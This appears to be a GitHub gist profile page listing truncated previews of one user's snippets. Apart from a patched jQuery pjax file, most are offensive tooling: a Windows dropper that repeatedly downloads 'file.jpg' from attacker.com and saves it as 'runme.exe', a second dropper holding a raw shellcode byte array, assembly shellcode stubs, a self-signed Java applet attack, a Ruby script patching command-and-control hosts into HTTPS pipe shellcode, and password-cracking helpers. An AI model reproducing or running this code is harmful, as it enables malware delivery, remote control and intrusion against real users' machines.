Skip to content

Instantly share code, notes, and snippets.

View phikshun's full-sized avatar

phikshun phikshun

85 followers · 0 following
View GitHub Profile
@phikshun
phikshun / gist:1554071
Created January 3, 2012 08:26
Patched jquery.pjax.js for rails/pjax pjax_redirect_to support.
// jquery.pjax.js
// copyright chris wanstrath
// https://github.com/defunkt/jquery-pjax
(function($){
// When called on a link, fetches the href with ajax into the
// container specified as the first parameter or with the data-pjax
// attribute on the link itself.
//
@phikshun
phikshun / drop.c
Created April 20, 2012 19:30
Dropper, First Take
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <urlmon.h>
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow) {
const char szFilename[] = "runme.exe";
const char szDownloadUrl[] = "http://attacker.com/file.jpg";
while(1) {
if (URLDownloadToFile(NULL, szDownloadUrl, szFilename, BINDF_GETNEWESTVERSION, NULL) == S_OK) {
@phikshun
phikshun / hash.rb
Created April 21, 2012 04:58
Shellcode Function Hash Generator
#!/usr/bin/env ruby
def b32_to_i(bin_arr)
val = 0; bin_arr.each_with_index { |b,i| val += b*(2**(31-i)) }; val
end
def i_to_b32(num)
val = 31.downto(0).each.map { |i| num[i] }
end
@phikshun
phikshun / accgen.rb
Created April 23, 2012 17:39
John passwd file to mschapv2acc file converter
#!/usr/bin/ruby
require 'digest/sha1'
if !ARGV[0] || !ARGV[1]
puts "Usage: accgen.rb <john-style-passfile.txt> <mschapv2acc-bin-output>"
puts ""
puts "Takes a John-sytle passwd file as input, separated as follows:"
puts "username:::AUTH_HASH:RESPONSE_HASH:PEER_HASH"
puts "The output file is ready for mschapv2acc cracking."
puts ""
@phikshun
phikshun / drop2.c
Created April 25, 2012 03:08
Dropper, Take 2
#define WIN32_LEAN_AND_MEAN
#include "Windows.h"
BYTE shellcode[] =
"\xfc\x89\xe6\x81\xec\x00\x20\x00\x00\xe8\x89\x00\x00\x00\x60\x89"
"\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
"\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1"
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20"
"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1"
@phikshun
phikshun / drop2.asm
Created April 25, 2012 03:17
Dropper, Take 2, Assembly Code
[BITS 32]
[ORG 0]
cld
mov esi, esp ; ESI points to the current postion of the stack (for ref local var)
sub esp, 2000h ; Alloc some stack space
call start
delta:
%include "block_api32.asm"
start:
@phikshun
phikshun / plugin.java
Created May 4, 2012 00:49
Self-Signed Java Applet Attack Code
import java.io.*;
import java.net.*;
import java.applet.*;
public class Plugin extends Applet {
public void init() {
Process f;
try {
java.io.BufferedInputStream in = new java.io.BufferedInputStream(new
@phikshun
phikshun / pipe_test.rb
Created May 29, 2012 03:04
WinInet Shellcode Pipe Test
require 'win32/pipe'
require 'timeout'
require 'injector'
def update_https_code(cnc_host, url, params, pipe)
pipe = "\\\\.\\pipe\\#{pipe}"
url = "#{url}\x00\x00\x00\x00\x00\x00" if url.length < 6
params = "\x00" if params.empty?
pipe_offset = (@https_pipe_code =~ /\\\\\.\\pipe\\fooo/)
url_offset = (@https_pipe_code =~ /\/12345/)
@phikshun
phikshun / https_winet_pipe32.asm
Created May 29, 2012 03:08
WinInet Pipe Shellcode
%define u(x) __utf16__(x)
[BITS 32]
[ORG 0]
cld
mov esi, esp ; ESI points to the current postion of the stack (for ref local var)
sub esp, 0x2000 ; Alloc some space on stack
call start
delta:
%include "block_api32.asm"
@phikshun
phikshun / https_curl_pipe32.asm
Created September 3, 2012 17:53
LibCurl Pipe Shellcode Win32
%define u(x) __utf16__(x)
[BITS 32]
[ORG 0]
cld
mov esi, esp ; ESI points to the current postion of the stack (for ref local var)
sub esp, 0x2000 ; Alloc some space on stack
call start
delta: